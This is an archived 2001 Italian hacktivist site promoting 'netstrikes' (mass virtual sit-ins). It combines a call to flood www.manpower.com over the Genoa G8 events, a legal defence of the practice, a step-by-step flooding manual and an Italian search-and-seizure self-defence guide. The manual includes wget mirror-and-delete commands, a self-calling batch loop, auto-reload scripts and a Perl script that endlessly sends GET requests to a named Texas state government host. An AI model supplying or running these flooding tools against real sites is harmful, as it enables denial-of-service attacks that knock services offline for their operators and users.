index_en.html0100644000106500010670000003324207335446523014357 0ustar netstrikenetstrike Netstrike - a new way to protest!
Cyber Rights Now!!! Netstrike - Web Protest for the Masses!
the art of connecting all together
to collapse a site for political espression
Cyber Rights Now!!!


From: Newsgroups: alt.activism
Subject: Fight for Your Right to Live and Communicate!
Sender: Secret Squirrel
Comments: Please report problems with this automated remailing service to . The message sender's identity is unknown, unlogged, and not replyable.
From: Secret Squirrel
Mail-To-News-Contact: postmaster@nym.alias.net
Organization: mail2news@nym.alias.net

Fight for Your Right to Live and Communicate!

The butchery carried out by the fascist italian state at the Independent Media Center of Genoa involved in producing free information on G8 days calls for hacktivism: if you think that human beings are not either bloody cases to be beaten or goods for global business partecipate to the netstrike (virtual sit-in) against www.manpower.com on August 3rd, 2001 from 3.00 p.m. GMT

Information and people want to be free!

Anonymous Digital Coalition

--

Open letter to Internet-News about the freedom of political speech in the net


The italian magazine Internet News publishes on page 14 a brief call in which correctly declares itself worried about the possible effects against the freedom caused by the newly-born "Communication Operators Registry", that is a creature of the famigerate publishing law and of an anachronistic culture that would make the Net a mainstream media's obbidient daugther.
Unfortunately, after few pages (pages 42-45), the magazine starts a well minded and covard attack against one of the most original inventions on the Net, considering the speech and political expression freedom: the netstrike (www.netstrike.it)
It is an explicit call to repression in this delicate moment when the anti-G8 protest is starting. The same G8 against which - till they will let us - we reply in political and mediatical terms with the present open letter.
Phrases like "netstrikers were often identified" and like "the invocated impossibility to have evidences for masses digital law-breaking will SOON break and with no doubt", are pretestuose, without any bases and according to our point of view such things are a bad sign (regarding the above mentioned article and the phrases in it, the Lawyer Barbara Gualtieri and Claudio Tistarelli wrote the following remarks that we report later on).
(Translator note: the translation from this point may be not totally correct due to the bad knowledge of law term by the translator) Anyway, the netstrike is a practice which has largely spread in the last six years all over the world and that is followed by many public order operators (all guilty for omissing the office act for not denouncing a law-breaking?) and by them often (look at the services' report and other documents) noticed just as not-illegal action.
Netstrike - perfect metaphore of the real demonstration concept - is a legal way of political and cultural expression. Not only us, as a group, we published a book about it ("Netstrike, no copyright, etc.", Strano Network, AAA Edizioni, 1996), but recently the Netstrike practice was described as an artistic act also by a classical art history book ("Arte e architettura dagli anni 60 ad oggi" by L. Vinca Masini, in "L'arte moderna - il secondo 900" by G. C. Argan, Edizione Sansoni per la scuola, Firenze, 2001). And so let's say sincerely that if somebody is thinking to repress it during the G8 event, this will be the sign that in the Net no more political and cultural access is allowed to people opposing the present state of things, and that it will be necessary to find other ways to express any eventual disagreement.
As far as the netstrike is a way of public representation for the political disagreement, performed by a mass of people who do not act differently than using absolutely legal communication features such as irc chat channels and surfing the web, they are making visible a social desease, a mediatic mass communication that the other part is invited to consider seriously even if the netstrike effect is simbolic and purely temporary.
As sTRANO nETWORK - communication workgroup which has invented this political practice - we've always been convinced of the necessity of being on a political and public discussion plan: this month, for instance, we are displaying our argumentations in a ShaKe publisher book and in the "Quaderni di Sociologia" magazine and during these years we've talked not only with "parts of the movement", but also with institutions and private groups at different levels always and however searching and experimenting new instruments to break down social and communication walls. And we want to go on this way without Damocle's swords on our heads nor on people which agrees with our ideals.
The Net - as Real Life does - doesn't need any more crackdown or bizarre laws against the freedom, but it needs inputs to criticate and improve the current state of things. It's becoming a matter of survival for people (in those countries where Internet is unknown) and for ideas (into the yet technologized world), the more we're going on.
Communication workgroup sTRANO nETWORK ~ http://strano.net

Legal answers by Barbara Gualtieri and Claudio Tistarelli:


On the 21st of the current month another G8 is going to have place in Genoa; subjects as globalization, poor countries slavery and politics faced to solve such problems are increasing the tension at every meeting. The problems approached are in fact so much important that anybody can even oppose them. The last ones have also been noticed for the increasing of fight between officers (protecting government chiefs and their becoming larger spaces) and demonstrants against a world-normalized system by the big western govs (even with all the contraddictions they have). In this violence explosion the aim of politicians and police on a side, and "Seattle people" on the other, was mostly directed to seek peace and non-violent manifestations. In this situation are being judged illegal some behaviours which allowed, to non-governative organizations and associations, to make sensible the public opinion and make possible certains boycott campaigns. We are talking about netstrike, the example of pacific online demonstration more famous. It consists in inviting people to partecipate to the protest by accessing on a certain date and time, the website you want to demonstrate against. Famous examples can be reported: France 1995, against the nuclear experiments about ten institutional websites were targeted; in 1996 a protest for Silvia Baraldini to be freed, the target was whitehouse.gov; and Fast, an american section of Amnesty International that obtained the freedom for a kurd tortured prisoner from the turk prisons by using the netstrike. According to Mr. Girolamo De Rada's opinion (Internet News, Tecniche Nuove, n. 7, July 2001) such behaviours should be punished as in art 617 quater, with the penalty from six months up to 4 years. Mr. De Rada maybe takes literally the law, without connecting it to what we define its ratio. The juridical object which the law tries to cover is in fact based on secretness of the communications relative to computer and/or telecommunications system. It doesn't point out to obfuscate and forbid protest forms absolutely legal and pacific which have even a limited effect in space and time. The same can be said about art. 635 bis c. p.: even in this case the law points out to repress computer criminals (and not pacifical protests); in fact the norm has solved the problem of so-called software sabotages, not punishable by article 635 c.p. for the definition of "incorporal entities" of computer data, not part of the concept of "things" of the upcalled law. This reason, and sure not for the netstrike, justifies the need for a new incriminating law. Art. 420 moreover, with the penalty of three up to eight years should point out to prevent from interruptions, even partial, of a computer system, but when done with consciousness and volountee acts the action made to damage or destroy computerized and telecommunication systems of public services. But those who choose this protest form doesn't want neither to destroy nor damage anything.
Netstrike has often been leaded to an unsuccess; this because its promoters trie to reach another goal: to recall the media and public opinion on the causes which are generating the protest. The goal is to talk about the reasons behind the protest.
At last and to close we have to underline the principle of current legacy in penal right, that obliges the judge to stay close to the strict diction of the incriminating law, without standing in interpretation for analogy, to avoid that the citizen is caught into bigger responsability than the citizen itself, for the principle in article 1 of the Penal Code would be explicitally recalled by the new incriminating law. The penalty to be applied in a situation that misses it, cannot be found using the interpretation by analogy... in the opposite case the law interpreter would become a law-maker with a strong negative mark, both on the sureness principle and on the practical influence of the penal laws involved in such interpretative operation that would be pointed out to join, with judge's help, the behaviour of the person who was active in breaking the law (or active in acting a way considered outlaw..) to a penalty that is not subject of any specific law. No penal law today claims the netstrike being outlaw;... no judge's interpretation today has explained one existant penal law as it can include the netstrike... None of the above mentioned laws could be reasonably pointed against the netstrike practice as even De Radaper would understand.
Avv. Barbara Gualtieri Dott. Claudio Tistarelli

What is a netstrike?
The Netstrike (or more properly 'digital manifestation') is a way of protest on the Net that consist of inviting a large amount of people who has an internet connection and, of course, users who has browsers to point their modems against a specific URL at a defined time and to continue to request web pages from this site continuesly, since they do "sit in" a web site till it is no more readable almost for the period the manifestation lasts.
A bandwidth squat similar to a physical protest that occupies a street till it is not accessible to others.
The basic idea is that an individual action, considered legal in the Net by every point of view, if it's made by a lot of users in the same time and on a common address can suspend an internet service.



Welcome to the art of mobilitation on the Net portal

here you can publish your digital manifestation's cohordinates and you can find technical suggestions about how to make your elettronic mobilitation. The important thing is that this manifestration is inspired by the freedom, justice and brotherhood well known principles

here you can NOT find inspirations to understand the reasons of your fighting or to find a clue about how to get your enemies. In case you didn't clear your ideas yet about similar subjects or you would like to discuss or to dig inside the ideas written in this pages, we suggest you to join the debate in the mailing-list cyber-rights



Apache warriors painted themselves of - white red yellow and black - to go to the battlefield

white to find immediately their enemies, black to hide from them until the facing time, red to put their enemies in fear and at the end the last color, yellow that should give power to solve the battle and destroy the enemy

in these pages you can learn how to paint yourselves of electrical red



For communications : info@netstrike.it




Isole nella Rete - autonomous zone!

site hosted by Isole nella Rete
istruzioni_en.html0100644000106500010670000003244207335446543015472 0ustar netstrikenetstrike Netstrike - Istruzioni per l'uso
Cyber Rights Now!!! Netstrike - Web Protest for the Masses! Cyber Rights Now!!!


Netstrike - User Manual
How can I partecipate?

[The phases are in order of rising difficulty, but don't get afraid: **************** ;-)]
The only real necessary things to partecipate a netstrike are contained in the first two sections of this page, they are about the fun of the irc gatherings while the protest is in act, and the minimal informations needed to do your part. The rest is just surplus for who want to really got hype ;-)

Coordination and Communication Section
  • If you have a preferred irc client, set as server www.ecn.org and as channel #hackit99, and follow online the evolution of the netstrike!
  • If you are not familiar with irc clients, connect to chat on Isole nella Rete, and be sure to use a java enabled browser.
  • If both the last two points fail, you can follow the netstrike in real time on the mailing list published at Cyber Rights
Smart Browsing Section
  • Start your preferred Browser [we think this point don't need further explanations ;-]
  • Don't set any proxyfor your connection
    Warning Maybe your office's proxy is your only way of access to the web, in this case try to gain access to a machine with a direct connection, if this is not possible your partecipation will be limited by the setting of your proxy, which are usually quite restictive :(
    • Internet Exploder
      1. Menu Visualizza
      2. Sezione Opzioni Internet
      3. Sottosezione Connessione
      4. Lasciate vuoto lo spazio in corrispondenza della voce Accedi a Internet tramite un Server Proxy
    • Netscape Navigator 3.x
      1. Menu Options
      2. Section Network Preferences
      3. Subsection Proxies
      4. Set the voice No Proxies
    • Netscape Navigator 4.x e seguenti
      1. Menu Edit
      2. Section Preferences
      3. Subsection Advanced -> Proxies
      4. Set the voice Direct connection on Internet
    • Opera
      1. Menu File
      2. Section Preferences
      3. Subsection Connections
      4. Disable the voice Proxy Servers
  • Set to 0 the cache of your browser
    • Internet Exploder - version 1
      1. Menu Visualize
      2. Sezione Internet Options
      3. Subsection General
      4. Internet Temporary Files -> Settings
      5. Set the research of a most recent version of the pages:
        at the page opening
      6. Bring to 0 the The space used by Temporary Internet Files
    • Internet Exploder - version 2
      1. Download disabilita.reg
      2. Double click on it
      3. To restore the original settings download riabilita.reg and do the same thing
    • Netscape Navigator 3.x
      1. Menu Options
      2. Section Network Preferences
      3. Subsection Cache
      4. Set the voice Verify Documents su Every time
      5. Set to 0 both the Memory Cache and the Disk Cache and click on Clear Memory Cache e Clear Disk Cache buttons
    • Netscape Navigator 4.x e seguenti
      1. Menu Edit
      2. Section Preferences
      3. Subsection Advanced -> Cache
      4. Set "Compare the page in the cache with the page on the network
        Every Time I view the page
      5. Set to 0 both the Memory Cache and the Disk Cache and click on Clear Memory Cache e Clear Disk Cache buttons
    • Opera
      1. Menu File
      2. Section Preferences
      3. Subsection HIstory and Cache
      4. Voice Check Modified
      5. Set all the parts of this voice always
      6. Set to 0 the voice Disk Cache
      7. Click on button Empty Now
  • Now insert the target web address in your navigation bar
  • Keep clicking Reload continuosly
    If you want to be REALLY sure to reload your page every time keep pushing the key Shift while you are reloading the page.
  • The last two operations can be executed on several browser windows at the same time, maximizing your firepower ;-))
    [To open another windows: Menu File -> Section New -> Subsession Window]
    Or, if possible, is even better to engage to operations described in this section with several different browsers(eg: Netscape and Exploder)

Bandwidth Section
  • Are you familiar with software aimed to download entire websites?
    If the answer is no you can download Teleport Pro o wget two programs that permito to download several different pages of the target site, optimizin your contribute to the netstrike.
    • Teleport
      1. Menu File
      2. New Project Wizard
      3. Follow thw wizard indications and fill the fields tha are needed:
        • Create a duplicate of the site on my hard disk
        • The targert of the netstrike as starting address
        • Download both text and graphic
      4. Go in the Starting address field on the left window and click right mouse button
      5. Section Starting address proprieties
      6. Set Exploration limits depth on To 10 links from starting address
    • wget
      1. You must digits
        wget -m --cache=off --delete-after -r -t0 -np --proxy=off Indirizzo interessato dal Netstrike
    • If you are using the dos version wget per dos (not windows):
        lauch nimefile.bat and wait.......
      • @echo off
      • echo.
      • echo.
      • echo NETSTRIKE!!!!
      • echo.
      • echo.
      • wget Target Address -r
      • -nH -m --user-agent=Netstrike_Crew
      • --delete-after
      • echo.
      • echo.
      • choice /t:s,5 Vuoi continuare a sostenere il Netstrike?
      • call nomefile.bat
    • If you are using wget under UNIX
      we have brought to you the option --netstrike
ProgPop Section (o People Programming)
  • Loa Netstrike: funny nasty javascripts bron from the mental hillness applied to graphics, produced here at LOA aimed to reload every 20 seconds the home page of the city of Milan;
    you need to flat to zero the cache of course
    We reccomend to open it in several windows to maximize your partecipation at Netstrike
  • disabilita.reg:Registry file that disable the Internet exploder cache;
    save it on your desktop and double-click on it;
    To restore the original setting we also have produced riabilita.reg, even this must be saved on desktop, double-click on it.
  • contributo di un amico hacaro alla causa: Another serverside script that automatically reload the target pages;
    like alway you need to put to zero the cache
    Suggested the opening of several windows at the same time
  • Jcounter by SpzkWebCrew:
    reload of a page every 10 seconds
    Intructions
    1. Set parameters in the counter.html file (address and delay)
    2. Load the page jcounter.html
    3. It do the rest...
    As always setting cache to zero and multiple loads of the page jcounter.html are suggested
  • Arachne: Sorry if we have put it here but it's not part of the other categories
    1. digit the address of the target of the Netstrike
    2. digit "q"
    3. wait
    4. F8
    5. repeat
Programming Section
  • write procedures with whaterver language you want (perl, html, php, javascript, java, C, C++, the virginmary know what other ;-)) aimed to the continuosly reload of the target pages
  • Another hacking contribute, this time his author is catalan. :) The code is quite simple and make *nasty requestes* at two URLs predefined (It was for the Netstrike against Death penality done 30 november 2000)... copy (or scaricatevi) the file and execute it with Perl, it does even 20 connections in a minute with a 56K..
    #!/usr/bin/perl
    
    ##	Netstrike contra la "Pena di morti".
    
    ##
    
    ##	Simple-Auto-Netstrike v 0.1
    
    ##	
    
    ##	kenneth@drac.com	
    
    ##
    
    
    
    use IO::Socket;
    
    
    
    $host="tdcj.state.tx.us";
    
    $start_query="Contra+%2Bla+%26pena+-cde+%26mort+i+altres+menes+de+matar+persones,
    +acabem+amb+els+estats+i+les+lleis+feixistes,+opressores+o+discriminatòries.";
    
    
    
    	$LINK[0]="/cgi-bin/Stop_Killing_People";
    
    	$start_link="/cgi-bin/texis/webinator/search/?db=db&query=";
    
    	$query=$start_query;
    
    	$end_link="&submit=Submit";
    
    
    
    	$i=0;
    	$j=0;
    for(;;)
    
    {
    
    	$i=$j%2;
    
    #	Here we get min-diff queries. I want the message to be readed :)
    
    #	Very simple. Excuese me but... I've modified it in 2 min!
    
    
    
    	if(($j%3)!=0)
    
    	{
    
    		$query=~ y/a-z/b-y/ ;
    
    		$LINK[1]=$start_link.$query.$end_link;		
    
    	}else{
    
    		$query=$j.$start_query.$j;
    
    		$LINK[1]=$start_link.$query.$end_link;
    
    	}
    
    
    
    	$sock = IO::Socket::INET->new(PeerAddr => $host,
    
    				PeerPort => 80,
    
    				Proto => 'tcp');
    
    	die "Socket $sock not connected: $!\n" unless $sock;
    
    	
    
    	$j++;
    
    #		print "$j\t-> GET $LINK[$i] HTTP/1.0\n";
    
    	printf "GET number: $j\n";
    
    	print $sock "GET $LINK[$i] HTTP/1.0\n\n";
    
    #	Here we read the socket :) long time ago, here was my spider's heart, 
    
    #	nowadays, its more useful for Netstrikes as we can see it now ;-)
    
    
    
    	while ($buf = <$sock>)
    
    	{
    
    	}
    
    	close ($sock);
    
    }




For more informations : info@netstrike.it







Isole nella Rete - autonomous zone!

site hosted by Isole nella Rete
legal_en.html0100644000106500010670000002372707335446543014345 0ustar netstrikenetstrike Netstrike - Vademecum di autodifesa legale
Cyber Rights Now!!! Netstrike - Web Protest for the Masses! Cyber Rights Now!!!

This part of the site is only in italian due to his close attinence with the italian laws.

Netstrike - Vademecum di autodifesa legale

vademecum autodifesa legale - doc.1
[barabara gualtieri - avvocato di Strano Network]


Premesso che è tutto da dimostrare che Tizio si sia collegato a quel sito per fare Netstrike piuttosto che per mera personale consultazione....
premesso che sia possibile sussumere il netstrike sotto una delle fattispecie di reati esistenti (nel penale non c'è analogia..o è reato o non lo è..)....
Occorre considerare che' che se Tizio...
nei giorni precedenti il Netstrike ha pubblicizzato il nETSTRIKE a destra e a sinistra, ha fatto capire che gli interessava parecchio...
lo ha organizzato o ha contribuito a farlo.......talchè........
appare di tutta evidenza che si sia collegato per quello scopo......
beh....qualora l'autorità giudiziaria riesca aconfigurare una ipotesi di reato ed a rintracciare tizio per mezzo di un monitoraggio (non ho idea di come...è solo una ipotesi....non so se tecnicamente è possibile...)...indico qui di seguito un piccolo memorandum.

conviene rammentare che:

i mezzi di ricerca della prova sono:
  1. ISPEZIONI di persone cose o luoghi.
    occorre un decreto motivato del pm.
    Prima di procedere all' ispezione personale l'interessato è avvertito della facolta di farsi assistere da persona di fiducia purchè questa sia PRONTAMENTE REPERIBILE e idonea.
    Nell' 'ispezione e di cose o luoghi a chi ne ha la disponibilità se è presente è consegnata copia del decreto che dispone l'accertamento.
    Al trasgressore puo' essere odinato che non si allontani.
  2. PERQUISIZIONI
    Viene disposta quando vi e' fondato motivo che tizio occulti sulla persona o in un certo luogo il copro del reato o cose pertinenti al reato.
    Che sia sulla persona o in un luogo tizio ha la facolta' di farsi assistere da persona di fiducia purchè prontamente reperibile ed idonea.
    Se la PERQUISIZIONE avviene in una abitazione o in luoghi chiusi adiacenti non puo' iniziare prima delle 7 o dopo le 20, salvo casi urgenti e disposizione scritta dell' Autorita' Giudizioaria.
    Le cose cosi' rinvenute vengono sottoposte a sequestro.
  3. SEQUESTRO del corpo del reato o di cose pertinenti al reato.
    Occorre un decreto motivato dell' Autorita' GiudiziariaG.
    Se Tizio è presente gli viene consegnato.
    Vale quanto anzidetto
    Contro il decreto di sequestro puo' essere proposta la richiesta di riesame.


vademecum autodifesa legale - doc.2
[asbesto - figura storica dell'hacking italiano]


...e adesso, ecco qualche istruzione nell'improbabile caso che qualcosa di simile capiti anche a voi.

  1. In caso di perquisizione, avete il diritto a chiamare un avvocato.
    Chi procede alla perquisizione, deve attendere l'arrivo dell'avvocato.
    Se non conoscete il nome di un avvocato, telefonate al piu' vicino Consiglio dell' Ordine degli Avvocati: ci sono sempre, o dovrebbero esserci, degli avvocati di turno.
    Se non trovate nessuno, telefonate a un amico, chiamate il vicino di casa. Chiamate la radio privata della vostra citta'.
  2. Leggete sempre attentamente il decreto di perquisizione, per capire che cosa possono perquisire e che cosa possono sequestrare.
    Chiedete di mettere a verbale tutte le vostre obiezioni: e' un vostro diritto.
  3. PRENDETEVI TUTTO IL TEMPO CHE VOLETE PER LEGGERE E CAPIRE.
    non c'e' alcuna fretta.
    se il decreto dice che e' possibile estrarre copia dei dati, PRETENDETELO, indipendentemente dal tempo necessario.
  4. In caso che vogliano sequestrare un hard disk o un floppy, chiedete di verificare e di mettere a verbale il contenuto: CIASCUN FILE.
    Se gli agenti non vogliono, mettete a verbale che non avrete nessuna responsabilita' di cio' che sara' rinvenuto.
    Spiegate questa necessita' all'avvocato: spesso gli avvocati non capiscono le questioni informatiche.
  5. Salvo che non sia espressamente previsto, il computer non puo' essere sequestrato se puo' essere fatta copia dell'hard disk.
  6. Una serie di cose che possono essere messe a verbale in caso di illegittimo sequestro possono essere queste, tratte da un documento ALCEI:
    Non solo privare una persona di una sostanziale possibilita' di sopravvivenza e comunicazione e' una palese violazione dei diritti civili.
    Ma e' anche una violazione delle leggi fondamentali della Repubblica Italiana e della comunita' internazionale.
    • Violazione di cinque articoli della Costituzione:
      • art.4 - Diritto al lavoro.
      • art.14 - Inviolabilita' del domicilio (il concetto di "domicilio informatico" e' definito dalla legge sui "computer crime").
      • art.15 - Liberta' e segretezza della corrispondenza (su un computer spesso si trova, oltre alla corrispondenza di chi lo possiede, anche quella di altri).
      • art.35 - Tutela del lavoro.
    • Violazione della convenzione per la salvaguardia dei diritti dell'uomo (protocollo addizionale):
      • art.1 - Ogni persona fisica o giuridica ha diritto al rispetto dei propri beni.
    • Violazione del codice di procedura penale:
      Il sequestro di corrispondenza informatica (che avviene anche a carico di terzi non indagati) e' in violazione degli Artt. 254-256-258 c.p.p. che tutelano la corrispondenza privata.
      Questo in particolare se sul vostro sistema giace corrispondenza privata di altri utenti (quindi se gestite un sistema con piu' utenti che usano i vs servizi)
da riflettere inoltre come si possa risalire alla causa di un qualsiasi problema, quando sulla propria macchina e' presente un account guest senza password, e non loggato ... virtualmente chiunque potrebbe entrare nel vostro sistema e fare qualunque cosa, giusto ?

vademecum autodifesa legale - doc.3
[ferry byte - messaggio del 3 aprile 2001]


ciao all !

sono stato sabato e domenica a Milano dove si sono registrate due giornate di iniziative veramente interessanti, al Ponte della Ghisolfa una full immersion credo proficua della mailing list Reddito e Lavoro di ECN, al Conchetta la presentazione di Malamilano (video e book dell'archivio Primo Moroni), feste e corsi al LOA_Bulk e al CSA Vittoria una due giorni di riflessioni con avvocati sulla repressione nei vari ambiti specifici della scuola, case occupate, movimento in generale e hacktivism in particolare

a parte la confortante sorpresa di trovare in tutti e tre gli ambiti sopra descritti una partecipazione massiccia agli eventi, l'ultimo in particolare - il convegno al vittoria promosso dai transiti sulla repressione - ha visto al tavolo digitale un proficuo scambio di conoscenze fra 4 (quattro) avvocati e agit-prop digitali

in particolare rispetto alla questione legittimazione del netstrike tutte/i e 4 le/gli avvocati presenti hanno espresso parere unanime che fino a quando non verra' prodotta una norma specifica non si potra' procedere utilizzando l'attuale apparato penale italiano - che NON puo' essere applicato per analogia - contro cio' che si annuncia come una manifestazione di pensiero (costituzionalmente prevista e tutelata) seppur in maniera tecnologica ed insolita come puo' esserlo un net-fax-phone_strike anche qualora venga effettuato da posto di lavoro visto che soprattutto in presenza di espressioni personali di scelte politiche (quindi dati sensibili) non sono ammessi automatismi di controllo a distanza sia per la normativa sulla privacy che per lo statuto dei lavoratori (diverso il caso se vieni scoperto da occhio di controllore umano in flagranza che stai facendo qualcosa di diverso da cio' che sei pagato per fare)

ATTENZIONE !!! si raccomanda comunque la massima prudenza essendo interpretazioni giuridico-giudiziarie ed essendo il netstrike una manifestazione politica: da usare dietro prescrizi... ops forte mobilitazione collettiva...
;-))




Per maggiori informazioni : info@netstrike.it







Isole nella Rete - autonomous zone!

sito ospitato da Isole nella Rete